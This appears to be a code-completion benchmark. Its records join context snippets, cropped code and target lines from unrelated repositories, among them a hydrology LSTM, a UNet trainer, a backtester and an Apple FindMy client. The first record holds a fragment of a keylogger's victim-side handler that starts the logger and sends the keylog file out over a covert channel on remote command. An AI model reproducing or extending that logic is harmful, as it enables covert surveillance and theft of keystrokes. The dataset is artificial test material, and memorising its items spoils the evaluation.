return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
|
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
| i = check_exists(file)
| 4 | 2023-12-19 18:54:22+00:00 | 2k |
yacinxx/dnakey | enginev2.py | [
{
"identifier": "ConfigManager",
"path": "profile_config/config_manager.py",
"snippet": "class ConfigManager:\r\n def __init__(self, prime_key:str) -> None:\r\n with open(\"profile_config/profile_config.json\", \"r\") as f: \r\n self.profile_data = __import__(\"json\").loads(f.read())\r\n self.profile_config = self.profile_data[\"profiles_config\"]\r\n self.prime_key = prime_key\r\n self.create_date = datetime.datetime.now()\r\n self.formatted_datetime = self.create_date.isoformat()\r\n\r\n def configuration(self):\r\n return self.profile_config\r\n \r\n def update_created_profiles(self):\r\n self.profile_config[self.prime_key][\"created_profiles\"] +=1\r\n toast(\":orange[**1 Profile has been added to your prime key**]\", icon=\"🍨\")\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_date_time(self):\r\n return self.profile_config[self.prime_key][\"date_time\"]\r\n\r\n def update_date_time(self):\r\n if self.profile_config[self.prime_key][\"date_time\"] is None:\r\n self.profile_config[self.prime_key].update({\"date_time\": self.formatted_datetime})\r\n success(\"**You 'Prime Key' has been activated successfully!**\", icon=\"🍧\")\r\n snow()\r\n \r\n def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None:\r\n self.action = self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]\r\n if id_profile not in self.action:\r\n self.action.update({id_profile:{\r\n \"active_usage\": 0,\r\n \"active_merge\": activate_merge,\r\n \"date_time\": formatted_datetime,\r\n \"request_status\": \"online\",\r\n \"save_cookies\": save_cookies,\r\n \"version\": VERSION}\r\n })\r\n\r\n def get_created_profiles(self):\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_active_profiles(self):\r\n active_profiles_ids = []\r\n active_profiles = 0\r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"] != 0:\r\n active_profiles+=1\r\n active_profiles_ids.append(f\"id:{i}\")\r\n return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else \"\" \r\n\r\n def get_online_profiles(self):\r\n all_profiles_online = [] \r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"request_status\"] == \"online\":\r\n all_profiles_online.append(\"online\")\r\n else:\r\n all_profiles_online.append(\"offline\")\r\n if all(profile == \"online\" for profile in all_profiles_online):\r\n return \"Online!\"\r\n else:\r\n return \"Not all profiles are online!\"\r\n\r\n def check_active_usage(self):\r\n all_profiles_active_usage = []\r\n for i in list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]):\r\n all_profiles_active_usage.append(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"])\r\n if all(profile == 0 for profile in all_profiles_active_usage):\r\n return \"first_time\"\r\n\r\n def get_profile_active_usage(self, id_profile:str) -> int:\r\n return self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"]\r\n\r\n def update_profile_active_usage(self, id_profile:str) -> None:\r\n self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"] +=1\r\n\r\n def get_merge_active_usage(self):\r\n return len(list(self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]))\r\n\r\n def get_profile_action_merge(self, id_profile:str) -> list[int]:\r\n get_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"][id_profile]\r\n action_merge_len = len(list(get_merge.keys()))\r\n action_merge = sum(list(get_merge.values()))\r\n return action_merge_len, action_merge\r\n\r\n def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None:\r\n action_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]\r\n if id_profile not in list(action_merge.keys()):\r\n action_merge.update({id_profile:{f\"({id_profile},{merge_with})\": 0}})\r\n if id_profile in list(action_merge.keys()):\r\n if f\"({id_profile},{merge_with})\" in list(action_merge[id_profile].keys()):\r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n else:\r\n action_merge[id_profile].update({f\"({id_profile},{merge_with})\": 0}) \r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n \r\n def update_config(self):\r\n with open(\"profile_config/profile_config.json\", \"w\") as f:\r\n __import__(\"json\").dump(self.profile_data, f, indent=3)\r"
},
{
"identifier": "VERSION",
"path": "license/license_manager.py",
"snippet": "VERSION = license_data[\"version\"]\r"
}
] | from cryptography.fernet import Fernet
from profile_config.config_manager import ConfigManager
from license.license_manager import VERSION
import random, json, string, datetime
| 1,550 |
class DNAEngine():
def __init__(
self,
has_key="test",
profile_name="profile_test",
activate_merge=True,
save_cookies=True,
**advance_settings):
self.has_key = has_key
self.profile_name = profile_name
self.length = advance_settings.get("length", 40)
self.has_lower = advance_settings.get("has_lower", True)
self.has_upper = advance_settings.get("has_upper", True)
self.has_number = advance_settings.get("has_number", True)
self.has_symbol = advance_settings.get("has_symbol", False)
self.has_arabic = advance_settings.get("has_arabic", False)
self.activate_merge = activate_merge
self.save_cookies = save_cookies
# Create a Fernet object with the secret key
secret_key = self.has_key.encode("utf-8")
self.fernet = Fernet(secret_key)
self.create_date = datetime.datetime.now()
# Convert datetime to string
self.formatted_datetime = self.create_date.isoformat()
self.random_func = {
"lower": self.get_random_lower,
"upper": self.get_random_upper,
"number": self.get_random_number,
"symbol": self.get_random_symbol,
"arabic": self.get_random_arabic
}
def create_id_profile(self):
self.config_has_key = f"dnakey${self.has_key[:32:2]}"
|
class DNAEngine():
def __init__(
self,
has_key="test",
profile_name="profile_test",
activate_merge=True,
save_cookies=True,
**advance_settings):
self.has_key = has_key
self.profile_name = profile_name
self.length = advance_settings.get("length", 40)
self.has_lower = advance_settings.get("has_lower", True)
self.has_upper = advance_settings.get("has_upper", True)
self.has_number = advance_settings.get("has_number", True)
self.has_symbol = advance_settings.get("has_symbol", False)
self.has_arabic = advance_settings.get("has_arabic", False)
self.activate_merge = activate_merge
self.save_cookies = save_cookies
# Create a Fernet object with the secret key
secret_key = self.has_key.encode("utf-8")
self.fernet = Fernet(secret_key)
self.create_date = datetime.datetime.now()
# Convert datetime to string
self.formatted_datetime = self.create_date.isoformat()
self.random_func = {
"lower": self.get_random_lower,
"upper": self.get_random_upper,
"number": self.get_random_number,
"symbol": self.get_random_symbol,
"arabic": self.get_random_arabic
}
def create_id_profile(self):
self.config_has_key = f"dnakey${self.has_key[:32:2]}"
| self.config_manager = ConfigManager(self.config_has_key)
| 0 | 2023-12-18 22:04:13+00:00 | 2k |
tamnva/hydroecolstm | examples/example_run.py | [
{
"identifier": "run_train",
"path": "hydroecolstm/model_run.py",
"snippet": "def run_train(config_file):\n \n # Load configuration\n config = read_config(config_file)\n\n # Read and split data\n data = read_train_test_data(config)\n \n # Scale/transformer name for static, dynamic, and target features\n x_scaler_name, y_scaler_name = get_scaler_name(config)\n \n # Scaler/transformer\n x_scaler, y_scaler = Scaler(), Scaler()\n x_scaler.fit(x=data[\"x_train\"], method=x_scaler_name)\n y_scaler.fit(x=data[\"y_train\"], method=y_scaler_name)\n \n # Scale/transform data\n x_train_scale = x_scaler.transform(x=data[\"x_train\"])\n x_test_scale = x_scaler.transform(x=data[\"x_test\"])\n y_train_scale = y_scaler.transform(x=data[\"y_train\"])\n \n # Create the model\n if config[\"model_class\"] == \"LSTM\":\n model = Lstm_Linears(config)\n else:\n model = Ea_Lstm_Linears(config)\n \n # Train with train dataset\n trainer = Train(config, model)\n model, y_train_scale_simulated = trainer(x=x_train_scale, y=y_train_scale)\n \n # Simulated result with test dataset\n y_test_simulated_scale = model(x_test_scale)\n \n # Inverse scale/transform back simulated result to real scale\n data[\"y_train_simulated\"] = y_scaler.inverse(y_train_scale_simulated)\n data[\"y_test_simulated\"] = y_scaler.inverse(y_test_simulated_scale)\n \n return model, x_scaler, y_scaler, data, config"
},
{
"identifier": "plot",
"path": "hydroecolstm/utility/plot.py",
"snippet": "def plot(data: dict, object_id:str,\n train_test_period:str, target_feature:str): \n \n # Get key of observed and simulated target features\n y_observed = \"y_\" + train_test_period\n y_simulated = \"y_\" + train_test_period + \"_simulated\"\n time = \"time_\" + train_test_period\n \n # Get index of the target feature\n index = data[\"y_column_name\"].index(target_feature)\n \n # Extract obeserved and target features from data\n y_observed = data[y_observed][object_id][:, index].detach().numpy()\n y_simulated = data[y_simulated][object_id][:, index].detach().numpy()\n time = data[time][object_id]\n \n # Now plot simulated and observed\n plt.plot(time, y_simulated, color = 'blue', label = \"Simulated\", alpha=0.9, linewidth=0.75)\n plt.plot(time, y_observed, color = 'red', label = \"Observed\", alpha=0.9, linewidth=0.75)\n plt.title(label=f\"Object id = {object_id}, period = {train_test_period}\")\n plt.ylabel(target_feature)\n plt.legend()\n\n return plt"
},
{
"identifier": "show_gui",
"path": "hydroecolstm/interface/main_gui.py",
"snippet": "def show_gui():\n app = MainGUI()\n app.mainloop() "
}
] | from hydroecolstm.model_run import run_train
from hydroecolstm.utility.plot import plot
from hydroecolstm.interface.main_gui import show_gui | 941 |
# Import hydroecolstm function
#-----------------------------------------------------------------------------#
# Run the model #
#-----------------------------------------------------------------------------#
# Configuration file
config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml"
# Train the model => return model, x_scaler, y_scaler, data
model, x_scaler, y_scaler, data, config = run_train(config_file)
# Visualize result: train_test_period = "train" or "test"
for object_id in config["object_id"]:
for target in config["target_features"]:
p = plot(data, object_id=str(object_id), train_test_period="test",
target_feature=target)
p.show()
#-----------------------------------------------------------------------------#
# Work with GUI, use the two lines below to call the GUI #
#-----------------------------------------------------------------------------#
|
# Import hydroecolstm function
#-----------------------------------------------------------------------------#
# Run the model #
#-----------------------------------------------------------------------------#
# Configuration file
config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml"
# Train the model => return model, x_scaler, y_scaler, data
model, x_scaler, y_scaler, data, config = run_train(config_file)
# Visualize result: train_test_period = "train" or "test"
for object_id in config["object_id"]:
for target in config["target_features"]:
p = plot(data, object_id=str(object_id), train_test_period="test",
target_feature=target)
p.show()
#-----------------------------------------------------------------------------#
# Work with GUI, use the two lines below to call the GUI #
#-----------------------------------------------------------------------------# | show_gui() | 2 | 2023-12-20 09:11:36+00:00 | 2k |
LuhhLu/Predictive-Video-Segmentation | unet_train.py | [
{
"identifier": "Load_unet",
"path": "Unet.py",
"snippet": "def Load_unet(path=None):\n if path:\n unet_model = UNet(n_channels=3, n_classes=49)\n unet_model.load_state_dict(torch.load(path))\n else:\n unet_model = UNet(n_channels=3, n_classes=49)\n return unet_model"
},
{
"identifier": "CustomDataset",
"path": "Unet.py",
"snippet": "class CustomDataset(Dataset):\n def __init__(self, image_dir, mask_dir, transform=None):\n self.image_dir = image_dir\n self.mask_dir = mask_dir\n self.transform = transform\n self.images = os.listdir(image_dir)\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n img_name = self.images[idx]\n img_path = os.path.join(self.image_dir, img_name)\n\n # Update mask name to match new naming convention and extension\n mask_name = img_name.replace('image', 'mask').replace('.png', '.npy')\n mask_path = os.path.join(self.mask_dir, mask_name)\n\n image = Image.open(img_path).convert(\"RGB\")\n mask = np.load(mask_path) # Load mask as numpy array\n\n if self.transform:\n seed = np.random.randint(2147483647) # Random seed for consistent transformations\n random.seed(seed)\n torch.manual_seed(seed)\n\n # Apply transformations to the image\n image = self.transform(image)\n\n # One-hot encode the transformed mask\n mask = one_hot_encode_mask(mask, 49)\n\n # Convert the mask back to a tensor\n mask = torch.from_numpy(mask)\n\n return image, mask"
},
{
"identifier": "WeightedBCEWithLogitsLoss",
"path": "Unet.py",
"snippet": "class WeightedBCEWithLogitsLoss(nn.Module):\n def __init__(self, weights, reduction='mean'):\n super().__init__()\n self.weights = weights\n self.reduction = reduction\n self.bce_loss = nn.BCEWithLogitsLoss(reduction='none')\n\n def forward(self, inputs, targets):\n bce_loss = self.bce_loss(inputs, targets)\n\n weights_expanded = self.weights.view(1, -1, 1, 1).to(bce_loss.device)\n\n weighted_loss = bce_loss * weights_expanded\n\n if self.reduction == 'mean':\n return weighted_loss.mean()\n elif self.reduction == 'sum':\n return weighted_loss.sum()\n else:\n return weighted_loss"
}
] | from tqdm import tqdm
from torch.utils.data import DataLoader
from torchvision import transforms
from Unet import Load_unet, CustomDataset, WeightedBCEWithLogitsLoss
import torch
import torch.optim as optim
import argparse | 943 |
def main():
# Command-line arguments
parser = argparse.ArgumentParser(description='Train UNet with custom settings')
parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')
parser.add_argument('--batch', type=int, default=64, help='Batch size')
parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
args = parser.parse_args()
# Process resolution argument
if args.res == 'full':
transform = transforms.Compose([
transforms.ToTensor(),
])
resolution = (160, 240)
else:
try:
res_value = int(args.res)
resolution = (res_value, res_value)
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Resize(resolution, antialias=True),
transforms.Resize((160, 240), antialias=True)
])
except ValueError:
raise ValueError("Invalid resolution value. Please provide 'full' or a single number.")
if args.res == 'full':
print("Training with Resolution: (160, 240)")
filename_suffix = 'full'
else:
res_value = int(args.res)
print(f"Training with Resolution: ({res_value}, {res_value})")
filename_suffix = str(res_value)
|
def main():
# Command-line arguments
parser = argparse.ArgumentParser(description='Train UNet with custom settings')
parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')
parser.add_argument('--batch', type=int, default=64, help='Batch size')
parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
args = parser.parse_args()
# Process resolution argument
if args.res == 'full':
transform = transforms.Compose([
transforms.ToTensor(),
])
resolution = (160, 240)
else:
try:
res_value = int(args.res)
resolution = (res_value, res_value)
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Resize(resolution, antialias=True),
transforms.Resize((160, 240), antialias=True)
])
except ValueError:
raise ValueError("Invalid resolution value. Please provide 'full' or a single number.")
if args.res == 'full':
print("Training with Resolution: (160, 240)")
filename_suffix = 'full'
else:
res_value = int(args.res)
print(f"Training with Resolution: ({res_value}, {res_value})")
filename_suffix = str(res_value)
| train_dataset = CustomDataset('unet_train/images', 'unet_train/masks', transform) | 1 | 2023-12-17 20:39:14+00:00 | 2k |
garinops/chat-E-AI | embed/clients/itchat/messages/friend.py | [
{
"identifier": "ITCHAT_CALL_CODE_SELF",
"path": "config/settings.py",
"snippet": "ITCHAT_CALL_CODE_SELF = \"AI\""
},
{
"identifier": "ITCHAT_CALL_CODE",
"path": "config/settings.py",
"snippet": "ITCHAT_CALL_CODE = \"AI\""
},
{
"identifier": "ITCHAT_WHITELIST_FRIEND",
"path": "config/settings.py",
"snippet": "ITCHAT_WHITELIST_FRIEND = {}"
},
{
"identifier": "EReplyText",
"path": "embed/reply/text.py",
"snippet": "class EReplyText:\n @staticmethod\n def reply(client, message:MessageCea) -> Send:\n _ceaMsg = message\n _action = _ceaMsg.Action\n _send = Send.model_construct()\n if _action:\n # 记录日志\n client.logger.info(f'Message Signal RX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_ceaMsg.Content)}')\n \"\"\"获取session\"\"\"\n _sess = client.get_session(sess_user_name=_ceaMsg.UserToSession)\n \"\"\"session 消息入列\"\"\"\n _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content)\n # AI sys messages更新。\n if _sess.ai.msgSysChck:\n if _ceaMsg.Content.startswith(\"###\"):\n _sess.ai.msgSys = _ceaMsg.Content[3:]\n _sess.ai.msgSysChck = False\n else:\n if _ceaMsg.Content.startswith(\"$$$\"):\n _sess.ai.msgSys = OPENAI_SYSTEM_CONTENT\n _sess.ai.msgSysChck = True\n client.logger.info(\"AI System Role:\" + OPENAI_SYSTEM_CONTENT)\n _sess.msgQueue.clear()\n \"\"\"session 消息重新入列\"\"\"\n _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content)\n elif _ceaMsg.Content.startswith(\"###\"):\n _sess.ai.msgSys = _ceaMsg.Content[3:]\n client.logger.info(\"AI System Role:\" + _sess.ai.msgSys)\n else:\n client.logger.info(\"AI System Role:\" + _sess.ai.msgSys)\n # AI user messages更新。\n _sess.ai.msgUserAssi = _sess.msgQueue.queue\n \"\"\"AI调用\"\"\"\n _sess.ai.response()\n _rspAi = _sess.ai.responseAI\n _rspAns = _rspAi.answer\n \"\"\"messages后置处理\"\"\"\n _sess.msgQueue.enqueue_assistant(message_content=_rspAns)\n \"\"\"assistant messages入列。\"\"\"\n _sess.ai.msgUserAssi = _sess.msgQueue.queue\n \"\"\"会话实例中的OpenAI实例 messages更新。\"\"\"\n # 添加前后缀\n # client.logger.debug({\"MessageCea\":_ceaMsg})\n _contentOutput = f'@{_ceaMsg.NickName}\\n{EUtilsSuffix.add_suffix(_rspAi)}' if _ceaMsg.IsGroup else EUtilsSuffix.add_suffix(_rspAi)\n # 返回\n _send.content = _contentOutput\n _send.user = _ceaMsg.UserToReply\n _send.action = True\n # client.logger.debug(_send)\n # 记录日志\n client.logger.info(f'Message Signal TX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_contentOutput)}')\n else:\n pass\n return _send"
},
{
"identifier": "MessageItchat",
"path": "models/messages.py",
"snippet": "class MessageItchat(BaseModel):\n FromUserName: str\n ToUserName: str\n Type: str\n User: Optional[User]\n Content: Optional[str] = None\n Text: Union[list[str], str, Callable]\n ActualNickName: Optional[str] = None\n IsAt: Optional[bool] = False"
},
{
"identifier": "MessageCea",
"path": "models/messages.py",
"snippet": "class MessageCea(BaseModel):\n UserToReply: Optional[str] = None\n UserToSession: Optional[str] = None\n Content: Optional[str] = None\n Action: Optional[bool] = False\n NickName: Optional[str] = None\n IsGroup: Optional[bool] = False"
},
{
"identifier": "Send",
"path": "models/send.py",
"snippet": "class Send(BaseModel):\n user: Optional[str] = None\n content: Optional[str] = None\n action: Optional[bool] = False"
}
] | from config.settings import ITCHAT_CALL_CODE_SELF, ITCHAT_CALL_CODE, ITCHAT_WHITELIST_FRIEND
from embed.reply.text import EReplyText
from models.messages import MessageItchat, MessageCea
from models.send import Send | 1,025 |
def handle_friend_message(client, message: MessageItchat) -> Send:
_callCodeSelf = ITCHAT_CALL_CODE_SELF
_callCode = ITCHAT_CALL_CODE
|
def handle_friend_message(client, message: MessageItchat) -> Send:
_callCodeSelf = ITCHAT_CALL_CODE_SELF
_callCode = ITCHAT_CALL_CODE | _whiteListFriend = ITCHAT_WHITELIST_FRIEND | 2 | 2023-12-16 17:02:13+00:00 | 2k |
ruudjuffermans/Event-Driven-Backtester | backtester/execution.py | [
{
"identifier": "FillEvent",
"path": "backtester/events.py",
"snippet": "class FillEvent(Event):\n \"\"\"\n Fill event once an order based on the response from the broker\n\n Parameters:\n datetime - A datetime at which the signal is created.\n symbol - The symbol for current asset.\n exchange - The exchange, broker where the order is filled\n quantity - quantity filled\n direction\n fill_cost - can contain commission already\n commission - Defaulted to None if non specified\n \"\"\"\n\n def __init__(\n self,\n datetime,\n symbol,\n exchange,\n quantity,\n direction,\n fill_cost,\n commission=None,\n ):\n self.type = \"FILL\"\n self.datetime = datetime\n self.symbol = symbol\n self.exchange = exchange\n self.quantity = quantity\n self.direction = direction\n self.fill_cost = fill_cost\n\n # Calculate commission\n if commission is None:\n self.commission = self._calculate_commission()\n else:\n self.commission = commission\n\n def _calculate_commission(self):\n \"\"\"\n TODO: Commission fees to be implemented\n \"\"\"\n # between 1 and 2%\n return max(1.5, 0.015 * self.quantity)"
},
{
"identifier": "OrderEvent",
"path": "backtester/events.py",
"snippet": "class OrderEvent(Event):\n \"\"\"\n Order event to be sent to a broker api. It takes into account the quantity,\n type of ordering, and direction (long, short, exit...)\n\n Parameters:\n symbol - The symbol for current asset.\n order_type - Whether is it a 'MARKET' or 'LIMIT' order\n quantity --> TODO: this should be implemented in a risk class\n (Kelly Criterion, etc)\n direction - 1 or -1 based on the type\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n self.type = \"ORDER\"\n self.symbol = symbol\n self.order_type = order_type\n self.quantity = quantity\n self.direction = direction\n\n def print_order(self):\n \"\"\"\n Outputs the values within the Order.\n \"\"\"\n print(\"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\") % (\n self.symbol,\n self.order_type,\n self.quantity,\n self.direction,\n )"
}
] | from abc import abstractmethod
from datetime import datetime
from .events import FillEvent, OrderEvent | 653 |
class ExecutionHandler:
def register(self, events):
self.events = events
@abstractmethod
def execute_order(self, event):
raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
def __init__(self):
pass
def execute_order(self, event):
|
class ExecutionHandler:
def register(self, events):
self.events = events
@abstractmethod
def execute_order(self, event):
raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
def __init__(self):
pass
def execute_order(self, event): | if isinstance(event, OrderEvent): | 1 | 2023-12-16 21:09:00+00:00 | 2k |
liebrandapps/FindMyGUI | findmy/request_reports.py | [
{
"identifier": "icloud_login_mobileme",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def icloud_login_mobileme(ctx, second_factor='sms'):\n username = ctx.cfg.appleId_appleId\n password = ctx.cfg.appleId_password\n anisetteUrl = ctx.cfg.general_anisetteHost + \":\" + str(ctx.cfg.general_anisettePort)\n if not username or not password:\n now = datetime.now()\n ctx.signInDone = False\n ctx.requestCreds = int(now.timestamp())\n ctx.log.info(\"[ICLOUD] Waiting for password (90 seconds from now on)\")\n interval = 30\n while interval > 0:\n time.sleep(3.0)\n if len(ctx.userName) > 0 and len(ctx.password) > 0:\n username = ctx.userName\n password = ctx.password\n interval = 0\n continue\n if not username or not password:\n ctx.log.error(\"[ICLOUD] No User/Password received, stopping\")\n return None\n else:\n ctx.log.info(f\"[ICLOUD] Received User {username} / Password\")\n\n g = gsa_authenticate(username, password, ctx, second_factor=second_factor)\n pet = g[\"t\"][\"com.apple.gs.idms.pet\"][\"token\"]\n adsid = g[\"adsid\"]\n\n data = {\n \"apple-id\": username,\n \"delegates\": {\"com.apple.mobileme\": {}},\n \"password\": pet,\n \"client-id\": str(USER_ID),\n }\n data = plist.dumps(data)\n\n headers = {\n \"X-Apple-ADSID\": adsid,\n \"User-Agent\": \"com.apple.iCloudHelper/282 CFNetwork/1408.0.4 Darwin/22.5.0\",\n \"X-Mme-Client-Info\": '<MacBookPro18,3> <Mac OS X;13.4.1;22F8> <com.apple.AOSKit/282 (com.apple.accountsd/113)>'\n }\n headers.update(generate_anisette_headers(anisetteUrl))\n\n r = requests.post(\n \"https://setup.icloud.com/setup/iosbuddy/loginDelegates\",\n auth=(username, pet),\n data=data,\n headers=headers,\n verify=False,\n )\n\n return plist.loads(r.content)"
},
{
"identifier": "generate_anisette_headers",
"path": "findmy/pypush_gsa_icloud.py",
"snippet": "def generate_anisette_headers(anisetteUrl):\n try:\n import pyprovision\n from ctypes import c_ulonglong\n import secrets\n adi = pyprovision.ADI(\"./anisette/\")\n adi.provisioning_path = \"./anisette/\"\n device = pyprovision.Device(\"./anisette/device.json\")\n if not device.initialized:\n # Pretend to be a MacBook Pro\n device.server_friendly_description = \"<MacBookPro13,2> <macOS;13.1;22C65> <com.apple.AuthKit/1 (com.apple.dt.Xcode/3594.4.19)>\"\n device.unique_device_identifier = str(uuid.uuid4()).upper()\n device.adi_identifier = secrets.token_hex(8).lower()\n device.local_user_uuid = secrets.token_hex(32).upper()\n adi.identifier = device.adi_identifier\n dsid = c_ulonglong(-2).value\n is_prov = adi.is_machine_provisioned(dsid)\n if not is_prov:\n print(\"provisioning...\")\n provisioning_session = pyprovision.ProvisioningSession(adi, device)\n provisioning_session.provision(dsid)\n otp = adi.request_otp(dsid)\n a = {\"X-Apple-I-MD\": base64.b64encode(bytes(otp.one_time_password)).decode(),\n \"X-Apple-I-MD-M\": base64.b64encode(bytes(otp.machine_identifier)).decode()}\n except ImportError:\n print(f'pyprovision is not installed, querying {anisetteUrl} for an anisette server')\n h = json.loads(requests.get(anisetteUrl, timeout=5).text)\n a = {\"X-Apple-I-MD\": h[\"X-Apple-I-MD\"], \"X-Apple-I-MD-M\": h[\"X-Apple-I-MD-M\"]}\n a.update(generate_meta_headers(user_id=USER_ID, device_id=DEVICE_ID))\n return a"
}
] | import base64
import datetime
import hashlib
import json
import os
import struct
import requests
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from findmy.pypush_gsa_icloud import icloud_login_mobileme, generate_anisette_headers | 1,373 |
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try:
|
class FindMy:
def __init__(self, ctx):
self.ctx = ctx
def sha256(self, data):
digest = hashlib.new("sha256")
digest.update(data)
return digest.digest()
def decrypt(self, enc_data, algorithm_dkey, mode):
decryptor = Cipher(algorithm_dkey, mode, default_backend()).decryptor()
return decryptor.update(enc_data) + decryptor.finalize()
def decode_tag(self, data):
latitude = struct.unpack(">i", data[0:4])[0] / 10000000.0
longitude = struct.unpack(">i", data[4:8])[0] / 10000000.0
confidence = int.from_bytes(data[8:9], 'big')
status = int.from_bytes(data[9:10], 'big')
return {'lat': latitude, 'lon': longitude, 'conf': confidence, 'status': status}
def getAuth(self, regenerate=False, second_factor='sms'):
CONFIG_PATH = os.path.dirname(os.path.realpath(__file__)) + "/auth.json"
if os.path.exists(CONFIG_PATH) and not regenerate:
with open(CONFIG_PATH, "r") as f:
j = json.load(f)
else:
mobileme = None
try: | mobileme = icloud_login_mobileme(self.ctx, second_factor=second_factor) | 0 | 2023-12-16 12:39:52+00:00 | 2k |
Samuel-Effiong/Django-Dynamic-Table | django_dynamic_table/models.py | [
{
"identifier": "TableHaveNoRow",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoRow(DynamicTableError):\r\n pass\r"
},
{
"identifier": "TableHaveNoColumn",
"path": "django_dynamic_table/errors.py",
"snippet": "class TableHaveNoColumn(DynamicTableError):\r\n pass\r"
},
{
"identifier": "ColumnNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class ColumnNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "RowNotInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class RowNotInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DuplicateColumnInTable",
"path": "django_dynamic_table/errors.py",
"snippet": "class DuplicateColumnInTable(DynamicTableError):\r\n pass\r"
},
{
"identifier": "DynamicTableError",
"path": "django_dynamic_table/errors.py",
"snippet": "class DynamicTableError(Exception):\r\n pass\r"
},
{
"identifier": "UnSupportedDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class UnSupportedDataType(TableColumnError):\r\n pass\r"
},
{
"identifier": "CantParseValueToDataType",
"path": "django_dynamic_table/errors.py",
"snippet": "class CantParseValueToDataType(CellValueError):\r\n pass\r"
},
{
"identifier": "CellDoesNotExist",
"path": "django_dynamic_table/errors.py",
"snippet": "class CellDoesNotExist(CellValueError):\r\n pass"
}
] | from typing import Sequence
from datetime import datetime
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from .errors import (
TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable,
RowNotInTable, DuplicateColumnInTable, DynamicTableError,
UnSupportedDataType, CantParseValueToDataType, CellDoesNotExist
)
| 934 | """
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models
Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""
__SUPPORTED_DATA_TYPE_CHOICES__ = (
('char', 'Char'),
('int', 'Int'),
('float', 'Float'),
